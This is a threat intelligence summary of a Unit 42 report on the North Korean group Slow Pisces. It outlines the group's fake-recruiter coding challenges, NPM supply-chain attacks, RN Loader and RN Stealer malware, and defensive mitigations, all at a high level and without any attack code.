Full Report
North Korean state-sponsored group Slow Pisces (Jade Sleet) targeted crypto developers with a social engineering campaign that included malicious coding challenges. The post Slow Pisces Targets Developers With Coding Challenges and Introduces New Customized Python Malware appeared first on Unit 42.
Analysis Summary
# Threat Actor: Slow Pisces
## Attribution & Identity
* **Attribution:** North Korean (DPRK) state-sponsored threat group.
* **Known Aliases:** Jade Sleet, TraderTraitor, PUKCHONG.
## Activity Summary
Slow Pisces is primarily focused on generating revenue for the North Korean regime. They were recently connected to attacks targeting the cryptocurrency sector, including the theft of $308 million in December 2024 from a Japan-based company, and alleged involvement in the theft of $1.5 billion from a Dubai cryptocurrency exchange. A current campaign involves targeting cryptocurrency developers by posing as potential employers on LinkedIn and sending malware disguised as fraudulent coding challenges. In 2023, the group reportedly stole over $1 billion USD from the cryptocurrency sector using various methods like fake trading applications and supply chain compromises through NPM.
## Tactics, Techniques & Procedures
* **Social Engineering:** Posing as potential employers on LinkedIn to engage developers.
* **Initial Access/Delivery:** Distributing malware hidden within malicious coding challenges that require developers to run compromised projects.
* **Supply Chain Compromise:** Distributing malware via the Node Package Manager (NPM).
* **Malware Deployment:** Using custom malware via various vectors.
* *Specific MITRE ATT&CK IDs were not provided in the source material.*
## Targeting
* **Sectors:** Cryptocurrency sector (primary focus).
* **Geography:** Not explicitly listed, but victims mentioned include Japan and Dubai (UAE).
* **Victims:** Large organizations, specifically cryptocurrency developers and exchanges.
## Tools & Infrastructure
* **Malware Families Used:** RN Loader, RN Stealer.
* **Infrastructure:** Malware distributed via the Node Package Manager (NPM). Other past methods included fake trading applications.
## Implications
Slow Pisces represents a highly effective, financially motivated threat actor sponsored by the DPRK. Their use of sophisticated social engineering tactics tailored specifically for developers (malicious coding challenges) and established supply chain pipelines (NPM) allows them to bypass traditional defenses and gain deep access into high-value financial targets, resulting in massive monetary heists.
## Mitigations
* Employ security solutions such as Next-Generation Firewalls with Advanced URL Filtering and Advanced DNS Security.
* Users (especially developers) should report suspicious activity on platforms like LinkedIn and GitHub.
* Exercise extreme caution when downloading and executing code from unsolicited sources, particularly when integrated into social engineering campaigns.